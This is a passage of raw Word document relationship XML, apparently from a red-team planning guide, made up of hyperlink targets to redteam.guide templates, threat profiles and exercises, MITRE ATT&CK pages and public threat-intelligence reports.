    <w:div w:id="2146851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redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.badguy.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/checklists/roe-planning" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Main_Page" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/cve-2014-1761-alley-compromise" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/blueheart" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Main_Page" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/cve-2014-1761-alley-compromise" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.billthelizard.com/2009/08/how-many-triangles.html" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Concepts/mitre_attack" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/blueheart" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.badguy.com/" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/03/09092926/EB-YetiJuly2014-Public.pdf" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/checklists/red-team-checklist" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://krebsonsecurity.com/wp-content/uploads/2015/02/Carbanak_APT_eng.pdf" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/ATT%26CK_Navigator" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/oplog" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/blueheart" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/37049/" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe@iheartredteams.com" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Main_Page" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.badguy.com/" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/cve-2014-1761-alley-compromise" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/checklists/red-team-checklist" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/ATT%26CK_Navigator" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pastebin.com/qCdMwtZ6" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Concepts/red-vs-pen-vs-vuln" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:blah.phisher@customer.com" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/03/09092926/EB-YetiJuly2014-Public.pdf" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/pre-attack/index.php/Main_Page" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/blueheart" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/checklists/red-team-checklist" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/blueheart" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/cve-2014-1761-alley-compromise" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pastebin.com/qCdMwtZ6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/checklists/red-team-checklist" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/03/09092926/EB-YetiJuly2014-Public.pdf" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baesystems.com/en/cybersecurity/feature/the-snake-campaign" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dtic.mil/get-tr-doc/pdf?AD=ADA091073&amp;Location=U2&amp;doc=GetTRDoc.pdf" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/the-attck%E2%84%A2-navigator-a-new-open-source" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe.snuffy@iheartredteams.com" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/blueheart" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jane.doe@customer.com" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mitre.github.io/attack-navigator/enterprise/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraft" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/blueheart" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/simplesam" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/roe_template" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/autobank" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 